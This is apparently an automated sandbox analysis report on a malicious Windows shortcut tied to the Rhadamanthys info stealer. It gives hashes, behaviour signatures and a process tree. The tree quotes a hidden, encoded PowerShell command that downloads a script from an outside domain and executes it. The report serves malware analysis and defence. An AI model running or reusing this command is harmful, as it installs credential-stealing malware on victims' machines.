Analysis
- max time kernel: 95s
- max time network: 205s
- platform: windows10-2004_x64
- resource: win10v2004-20240226-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 05-04-2024 08:57
Static task: static1
Behavioral task: behavioral1
  Sample: DOC527 - 527527.lnk
  Resource: win7-20240319-en
Behavioral task: behavioral2
  Sample: DOC527 - 527527.lnk
  Resource: win10v2004-20240226-en
General
- Target: DOC527 - 527527.lnk
- Size: 9KB
- MD5: 8f67aaa7b8bf4df78de954a16bcf67ca
- SHA1: 2cedea1467518ab950820767b6f546344d228305
- SHA256: b8a5cb1a0bc2ddd5b12f29781391ce38806b8dd0af28a0612d71a58063250ae8
- SHA512: 09519377b6dbedb528e4c96342b4c28ad71e2a286bb61866daea52d8a657969e4d53685cc14e122e8f3eb24e9ca5e0da6d77b2786d502b1b9a056c7154e83934
- SSDEEP: 192:8z55hm3MSBf6OY1tvnT1wEuz4+nCWLFf3m/9h0yAE7oxMdPDTJvs3DoTNxHJ6:u5vcMS5otvnT1w7p9WIBE7UkpoyHJ6
Malware Config
Signatures
- Rhadamanthys
  Rhadamanthys is an info stealer written in C++ first seen in August 2022.
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
  Processes: powershell.exe
  description | pid | process | target process
  PID 2396 created 2652 | 2396 | powershell.exe | sihost.exe
- Blocklisted process makes network request (1 IoCs)
  Processes: powershell.exe
  flow | pid | process
  4 | 2396 | powershell.exe
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes: cmd.exe
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | cmd.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes: powershell.exe, dialer.exe
  pid | process
  2396 | powershell.exe
  2396 | powershell.exe
  2396 | powershell.exe
  2396 | powershell.exe
  4308 | dialer.exe
  4308 | dialer.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes: powershell.exe
  description | pid | process
  Token: SeDebugPrivilege | 2396 | powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes: cmd.exe, powershell.exe
  description | pid | process | target process
  PID 2088 wrote to memory of 2396 | 2088 | cmd.exe | powershell.exe
  PID 2088 wrote to memory of 2396 | 2088 | cmd.exe | powershell.exe
  PID 2396 wrote to memory of 4308 | 2396 | powershell.exe | dialer.exe
  PID 2396 wrote to memory of 4308 | 2396 | powershell.exe | dialer.exe
  PID 2396 wrote to memory of 4308 | 2396 | powershell.exe | dialer.exe
  PID 2396 wrote to memory of 4308 | 2396 | powershell.exe | dialer.exe
Processes
- C:\Windows\system32\sihost.exe
  Command line: sihost.exe
  PID: 2652
  - C:\Windows\system32\dialer.exe
    Command line: "C:\Windows\system32\dialer.exe"
    PID: 4308
    Signatures:
    - Suspicious behavior: EnumeratesProcesses
- C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\DOC527 - 527527.lnk"
  PID: 2088
  Signatures:
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -WindowStyle Hidden -Enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBpAG0AYQBuAGkAawB1AHUALgBjAG8AbQAvAGQAbwBuAGUALgB0AHgAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAIAB8ACAAaQBOAHYATwBrAEUALQBFAHgAUAByAGUAUwBzAGkATwBuAA==
    PID: 2396
    Signatures:
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82